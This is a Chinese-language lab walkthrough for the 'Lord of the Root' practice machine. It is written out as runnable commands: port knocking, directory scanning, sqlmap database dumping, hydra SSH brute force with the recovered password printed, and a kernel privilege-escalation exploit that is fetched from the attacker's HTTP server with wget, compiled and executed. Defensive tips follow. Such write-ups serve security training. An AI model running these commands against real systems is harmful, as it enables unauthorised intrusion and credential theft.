Lord of the Root 靶机渗透测试详细教程

1. 靶机信息与初始发现

• 靶机IP: 192.168.160.131
• 初始扫描发现仅开放22端口(SSH服务)
• 需要端口碰撞(Port Knocking)技术来开启其他服务

2. 端口碰撞与进一步扫描

1. 执行端口碰撞后，1337端口(Apache服务)被开启
2. 使用nmap进行详细扫描：

   nmap -sV -p- 192.168.160.131
   

3. Web应用枚举

1. 使用Dirsearch扫描Web目录：

   dirsearch -u http://192.168.160.131:1337
   

2. 检查404.html页面源代码，发现隐藏信息
3. 对源代码中的内容进行两次Base64解码，得到路径：/978345210/index.php

4. SQL注入攻击

1. 发现index.php存在SQL注入漏洞
2. 使用sqlmap自动化工具进行注入：

   sqlmap -u "http://192.168.160.131:1337/978345210/index.php" --dbs
   sqlmap -u "http://192.168.160.131:1337/978345210/index.php" -D database_name --tables
   sqlmap -u "http://192.168.160.131:1337/978345210/index.php" -D database_name -T table_name --dump
   

3. 从数据库中提取用户名和密码，分别保存为：
   • users.txt
   • pass.txt

5. SSH暴力破解

1. 使用hydra进行SSH爆破：

   hydra -L users.txt -P pass.txt ssh://192.168.160.131
   

2. 成功获取有效凭据：
   • 用户名: smeagol
   • 密码: MyPreciousR00t

6. 初始访问与信息收集

1. 使用获取的凭据登录SSH：

   ssh smeagol@192.168.160.131
   

2. 检查系统内核版本：

   uname -a
   

   结果显示为Ubuntu 14.04系统

7. 内核提权

1. 使用searchsploit搜索Ubuntu 14.04本地提权漏洞：

   searchsploit ubuntu 14.04 Local Privilege Escalation
   

2. 发现漏洞编号39166.c，下载利用代码：

   searchsploit -m 39166
   

3. 在攻击机上启动HTTP服务：

   python -m SimpleHTTPServer 80
   

4. 在靶机上下载并编译执行：

   wget http://<攻击机IP>/39166.c
   gcc 39166.c -o exploit
   chmod +x exploit
   ./exploit
   

8. 获取Root权限

执行提权利用程序后，成功获取root权限，完成整个渗透测试过程。

关键点总结

1. 端口碰撞是初始访问的关键步骤
2. Web应用源代码分析可能泄露重要信息
3. Base64多层编码需要多次解码
4. SQL注入是获取用户凭据的主要途径
5. 内核漏洞利用是提权的有效方法
6. 整个渗透过程涉及多个阶段的攻击链

防御建议

1. 禁用不必要的端口碰撞配置
2. 对Web应用源代码进行安全审查
3. 实施输入验证防止SQL注入
4. 使用强密码策略
5. 及时更新系统内核补丁
6. 实施最小权限原则